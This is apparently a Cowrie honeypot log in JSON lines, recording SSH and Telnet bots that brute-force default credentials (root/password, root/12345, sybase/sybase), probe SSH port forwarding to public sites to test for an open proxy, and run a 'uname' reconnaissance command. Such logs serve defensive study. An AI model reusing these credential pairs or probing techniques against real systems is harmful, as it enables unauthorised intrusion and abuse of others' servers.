{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:22.030538Z","src_ip":"212.227.235.229","session":"3a54b31d15e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53456,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2d70fec807a","protocol":"ssh","message":"New connection: 212.227.235.229:53456 (1.2.3.4:22) [session: c2d70fec807a]","sensor":"my-vps","timestamp":"2025-08-28T16:36:22.179821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:22.180504Z","src_ip":"212.227.235.229","session":"c2d70fec807a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:22.331557Z","src_ip":"212.227.235.229","session":"c2d70fec807a"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:22.635912Z","src_ip":"212.227.235.229","session":"c2d70fec807a"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:22.636568Z","src_ip":"212.227.235.229","session":"c2d70fec807a"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYxw2QaCCqrE/asq1hiw92YMDEq3idgtME5mq4qqE+p4+TY7Gk2ruAxDJ+XwAbS8W0XyipUArfn9vPTUikzU2yOw0aZnY0mDRS+CYslPSd1vniIt+U2oKZ7IE87a8PdK//TsD9oLVqvEtSWik8ObFVSOMhdJEstIZgNwVbh40MJBC/eEelVRf9pYQQgtoSEoMNOJMv1m+zukKose9wiJAqoh5ElO6yKWsv8KFDL2vmSUDIdOwS1bQMdcuhgQZ92Huiq3iYiXjpiQNJCo9F7/lcKdQNdAPVT7a2M1rF3Luxx2GNKTn4EntxXEBWsQM5PW/5a06PCsyhiCnCBEed78Ml","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","sensor":"my-vps","timestamp":"2025-08-28T16:36:22.788800Z","src_ip":"212.227.235.229","session":"c2d70fec807a"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYxw2QaCCqrE/asq1hiw92YMDEq3idgtME5mq4qqE+p4+TY7Gk2ruAxDJ+XwAbS8W0XyipUArfn9vPTUikzU2yOw0aZnY0mDRS+CYslPSd1vniIt+U2oKZ7IE87a8PdK//TsD9oLVqvEtSWik8ObFVSOMhdJEstIZgNwVbh40MJBC/eEelVRf9pYQQgtoSEoMNOJMv1m+zukKose9wiJAqoh5ElO6yKWsv8KFDL2vmSUDIdOwS1bQMdcuhgQZ92Huiq3iYiXjpiQNJCo9F7/lcKdQNdAPVT7a2M1rF3Luxx2GNKTn4EntxXEBWsQM5PW/5a06PCsyhiCnCBEed78Ml","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:22.790809Z","src_ip":"212.227.235.229","session":"c2d70fec807a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:22.942872Z","src_ip":"212.227.235.229","session":"c2d70fec807a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60966,"dst_ip":"1.2.3.4","dst_port":22,"session":"9425ec448458","protocol":"ssh","message":"New connection: 212.227.125.160:60966 (1.2.3.4:22) [session: 9425ec448458]","sensor":"my-vps","timestamp":"2025-08-28T16:36:40.392758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:36:40.393731Z","src_ip":"212.227.125.160","session":"9425ec448458"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:40.443167Z","src_ip":"212.227.125.160","session":"9425ec448458"}
{"eventid":"cowrie.login.failed","username":"solv","password":"1234567","message":"login attempt [solv/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:40.592390Z","src_ip":"212.227.125.160","session":"9425ec448458"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:41.644827Z","src_ip":"212.227.125.160","session":"9425ec448458"}
{"eventid":"cowrie.session.connect","src_ip":"62.90.221.4","src_port":32863,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb3f5d092ef8","protocol":"telnet","message":"New connection: 62.90.221.4:32863 (1.2.3.4:23) [session: bb3f5d092ef8]","sensor":"my-vps","timestamp":"2025-08-28T16:36:54.409058Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":56705,"dst_ip":"1.2.3.4","dst_port":22,"session":"47ab311ea7a8","protocol":"ssh","message":"New connection: 185.246.128.133:56705 (1.2.3.4:22) [session: 47ab311ea7a8]","sensor":"my-vps","timestamp":"2025-08-28T16:36:55.464239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PuTTY_Release_0.67","message":"Remote SSH version: SSH-2.0-PuTTY_Release_0.67","sensor":"my-vps","timestamp":"2025-08-28T16:36:55.464957Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-28T16:36:55.509759Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:36:56.425993Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":11824,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:11824","sensor":"my-vps","timestamp":"2025-08-28T16:36:56.471831Z","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T16:36:56.518865Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":21228,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:21228","sensor":"my-vps","timestamp":"2025-08-28T16:36:56.651133Z","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T16:36:56.695808Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"185.246.128.133","src_port":26927,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26927","sensor":"my-vps","timestamp":"2025-08-28T16:36:56.827144Z","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T16:36:56.872037Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"185.246.128.133","src_port":14127,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:14127","sensor":"my-vps","timestamp":"2025-08-28T16:36:57.003187Z","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T16:36:57.047950Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":26669,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:26669","sensor":"my-vps","timestamp":"2025-08-28T16:36:57.179077Z","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T16:36:57.224228Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"185.246.128.133","src_port":28809,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:28809","sensor":"my-vps","timestamp":"2025-08-28T16:36:57.355054Z","session":"47ab311ea7a8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T16:36:57.399699Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:57.445037Z","src_ip":"185.246.128.133","session":"47ab311ea7a8"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38221,"dst_ip":"1.2.3.4","dst_port":23,"session":"114df1baea50","protocol":"telnet","message":"New connection: 218.1.218.143:38221 (1.2.3.4:23) [session: 114df1baea50]","sensor":"my-vps","timestamp":"2025-08-28T16:37:01.566341Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38214,"dst_ip":"1.2.3.4","dst_port":23,"session":"b80c5c6d3446","protocol":"telnet","message":"New connection: 218.1.218.143:38214 (1.2.3.4:23) [session: b80c5c6d3446]","sensor":"my-vps","timestamp":"2025-08-28T16:37:01.722393Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38233,"dst_ip":"1.2.3.4","dst_port":23,"session":"fb076b9aa655","protocol":"telnet","message":"New connection: 218.1.218.143:38233 (1.2.3.4:23) [session: fb076b9aa655]","sensor":"my-vps","timestamp":"2025-08-28T16:37:03.606890Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38269,"dst_ip":"1.2.3.4","dst_port":23,"session":"06ece03738af","protocol":"telnet","message":"New connection: 218.1.218.143:38269 (1.2.3.4:23) [session: 06ece03738af]","sensor":"my-vps","timestamp":"2025-08-28T16:37:07.685385Z"}
{"eventid":"cowrie.session.closed","duration":13.29600214958191,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:37:07.704986Z","src_ip":"62.90.221.4","session":"bb3f5d092ef8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44298,"dst_ip":"1.2.3.4","dst_port":22,"session":"836e996e240a","protocol":"ssh","message":"New connection: 212.227.235.229:44298 (1.2.3.4:22) [session: 836e996e240a]","sensor":"my-vps","timestamp":"2025-08-28T16:37:14.065188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:37:14.065956Z","src_ip":"212.227.235.229","session":"836e996e240a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:37:14.171405Z","src_ip":"212.227.235.229","session":"836e996e240a"}
{"eventid":"cowrie.login.failed","username":"sybase","password":"sybase","message":"login attempt [sybase/sybase] failed","sensor":"my-vps","timestamp":"2025-08-28T16:37:14.489140Z","src_ip":"212.227.235.229","session":"836e996e240a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:37:15.598216Z","src_ip":"212.227.235.229","session":"836e996e240a"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38319,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2b8f168b369","protocol":"telnet","message":"New connection: 218.1.218.143:38319 (1.2.3.4:23) [session: c2b8f168b369]","sensor":"my-vps","timestamp":"2025-08-28T16:37:16.001791Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37388,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a0262090222","protocol":"ssh","message":"New connection: 212.227.235.229:37388 (1.2.3.4:22) [session: 3a0262090222]","sensor":"my-vps","timestamp":"2025-08-28T16:37:23.566521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:37:23.567711Z","src_ip":"212.227.235.229","session":"3a0262090222"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T16:37:23.775738Z","src_ip":"212.227.235.229","session":"3a0262090222"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:37:24.402298Z","src_ip":"212.227.235.229","session":"3a0262090222"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:37:24.835001Z","src_ip":"212.227.235.229","session":"3a0262090222"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T16:37:24.835689Z","src_ip":"212.227.235.229","session":"3a0262090222"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:37:25.045259Z","src_ip":"212.227.235.229","session":"3a0262090222"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:37:25.046294Z","src_ip":"212.227.235.229","session":"3a0262090222"}
{"eventid":"cowrie.session.closed","duration":41.02928972244263,"message":"Connection lost after 41 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:37:42.595549Z","src_ip":"218.1.218.143","session":"114df1baea50"}
{"eventid":"cowrie.session.closed","duration":43.49535870552063,"message":"Connection lost after 43 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:37:59.497057Z","src_ip":"218.1.218.143","session":"c2b8f168b369"}
{"eventid":"cowrie.session.closed","duration":61.00338912010193,"message":"Connection lost after 61 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:38:02.725702Z","src_ip":"218.1.218.143","session":"b80c5c6d3446"}
{"eventid":"cowrie.session.closed","duration":59.518434047698975,"message":"Connection lost after 59 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:38:03.124457Z","src_ip":"218.1.218.143","session":"fb076b9aa655"}
{"eventid":"cowrie.session.closed","duration":59.49364352226257,"message":"Connection lost after 59 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:38:07.178957Z","src_ip":"218.1.218.143","session":"06ece03738af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52641,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba1733cea3bc","protocol":"ssh","message":"New connection: 212.227.125.160:52641 (1.2.3.4:22) [session: ba1733cea3bc]","sensor":"my-vps","timestamp":"2025-08-28T16:38:13.002749Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:38:13.003959Z","src_ip":"212.227.125.160","session":"ba1733cea3bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52921,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3cf03bd6c83","protocol":"ssh","message":"New connection: 212.227.125.160:52921 (1.2.3.4:22) [session: a3cf03bd6c83]","sensor":"my-vps","timestamp":"2025-08-28T16:38:13.119327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:38:13.120503Z","src_ip":"212.227.125.160","session":"a3cf03bd6c83"}
